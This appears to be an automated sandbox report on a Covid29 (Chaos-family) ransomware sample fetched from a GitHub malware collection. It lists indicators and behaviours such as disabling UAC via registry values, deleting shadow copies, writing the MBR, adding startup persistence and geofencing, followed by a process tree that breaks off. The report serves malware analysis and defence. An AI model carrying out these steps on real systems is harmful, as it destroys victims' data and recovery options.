Analysis
-
max time kernel
187s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2024 18:24
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old
Resource
win10v2004-20240802-en
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 4 IoCs
resource yara_rule behavioral1/files/0x00070000000235d5-319.dat family_chaos behavioral1/memory/5028-327-0x0000000000680000-0x00000000006A0000-memory.dmp family_chaos behavioral1/memory/2908-404-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos behavioral1/memory/2908-417-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5344 bcdedit.exe 5360 bcdedit.exe -
pid Process 5432 wbadmin.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Cov29Cry.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 1676 mbr.exe 5028 Cov29Cry.exe 2840 svchost.exe 6008 Cov29LockScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2908-294-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/2908-404-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/2908-417-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1302416131-1437503476-2806442725-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 53 raw.githubusercontent.com 54 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ck8olwjoj.jpg" svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3036 PING.EXE 4104 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1668 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5960 taskkill.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 4104 reg.exe 4364 reg.exe 1748 reg.exe 1408 reg.exe 1492 reg.exe 556 reg.exe 4160 reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3036 PING.EXE 4104 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2840 svchost.exe -
Suspicious behavior: EnumeratesProcesses 57 IoCs
pid Process 676 msedge.exe 676 msedge.exe 2400 msedge.exe 2400 msedge.exe 1208 identity_helper.exe 1208 identity_helper.exe 1236 msedge.exe 1236 msedge.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 5028 Cov29Cry.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 2840 svchost.exe 5252 msedge.exe 5252 msedge.exe 5252 msedge.exe 5252 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeShutdownPrivilege 3528 shutdown.exe Token: SeRemoteShutdownPrivilege 3528 shutdown.exe Token: SeDebugPrivilege 5028 Cov29Cry.exe Token: SeDebugPrivilege 2840 svchost.exe Token: SeBackupPrivilege 4120 vssvc.exe Token: SeRestorePrivilege 4120 vssvc.exe Token: SeAuditPrivilege 4120 vssvc.exe Token: SeIncreaseQuotaPrivilege 5224 WMIC.exe Token: SeSecurityPrivilege 5224 WMIC.exe Token: SeTakeOwnershipPrivilege 5224 WMIC.exe Token: SeLoadDriverPrivilege 5224 WMIC.exe Token: SeSystemProfilePrivilege 5224 WMIC.exe Token: SeSystemtimePrivilege 5224 WMIC.exe Token: SeProfSingleProcessPrivilege 5224 WMIC.exe Token: SeIncBasePriorityPrivilege 5224 WMIC.exe Token: SeCreatePagefilePrivilege 5224 WMIC.exe Token: SeBackupPrivilege 5224 WMIC.exe Token: SeRestorePrivilege 5224 WMIC.exe Token: SeShutdownPrivilege 5224 WMIC.exe Token: SeDebugPrivilege 5224 WMIC.exe Token: SeSystemEnvironmentPrivilege 5224 WMIC.exe Token: SeRemoteShutdownPrivilege 5224 WMIC.exe Token: SeUndockPrivilege 5224 WMIC.exe Token: SeManageVolumePrivilege 5224 WMIC.exe Token: 33 5224 WMIC.exe Token: 34 5224 WMIC.exe Token: 35 5224 WMIC.exe Token: 36 5224 WMIC.exe Token: SeIncreaseQuotaPrivilege 5224 WMIC.exe Token: SeSecurityPrivilege 5224 WMIC.exe Token: SeTakeOwnershipPrivilege 5224 WMIC.exe Token: SeLoadDriverPrivilege 5224 WMIC.exe Token: SeSystemProfilePrivilege 5224 WMIC.exe Token: SeSystemtimePrivilege 5224 WMIC.exe Token: SeProfSingleProcessPrivilege 5224 WMIC.exe Token: SeIncBasePriorityPrivilege 5224 WMIC.exe Token: SeCreatePagefilePrivilege 5224 WMIC.exe Token: SeBackupPrivilege 5224 WMIC.exe Token: SeRestorePrivilege 5224 WMIC.exe Token: SeShutdownPrivilege 5224 WMIC.exe Token: SeDebugPrivilege 5224 WMIC.exe Token: SeSystemEnvironmentPrivilege 5224 WMIC.exe Token: SeRemoteShutdownPrivilege 5224 WMIC.exe Token: SeUndockPrivilege 5224 WMIC.exe Token: SeManageVolumePrivilege 5224 WMIC.exe Token: 33 5224 WMIC.exe Token: 34 5224 WMIC.exe Token: 35 5224 WMIC.exe Token: 36 5224 WMIC.exe Token: SeBackupPrivilege 5464 wbengine.exe Token: SeRestorePrivilege 5464 wbengine.exe Token: SeSecurityPrivilege 5464 wbengine.exe Token: SeDebugPrivilege 5960 taskkill.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe 2400 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6008 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2400 wrote to memory of 4828 2400 msedge.exe 83 PID 2400 wrote to memory of 4828 2400 msedge.exe 83 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 4932 2400 msedge.exe 84 PID 2400 wrote to memory of 676 2400 msedge.exe 85 PID 2400 wrote to memory of 676 2400 msedge.exe 85 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 PID 2400 wrote to memory of 2624 2400 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff83fde46f8,0x7ff83fde4708,0x7ff83fde47182⤵PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:22⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:82⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:2324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:82⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:12⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3384 /prefetch:82⤵PID:3892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5948 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:12⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,13682130359001396896,5510221133274005188,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3288 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1052
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2092
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2448
-
C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"1⤵
- System Location Discovery: System Language Discovery
PID:2908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6D2C.tmp\TrojanRansomCovid29.bat" "2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:784 -
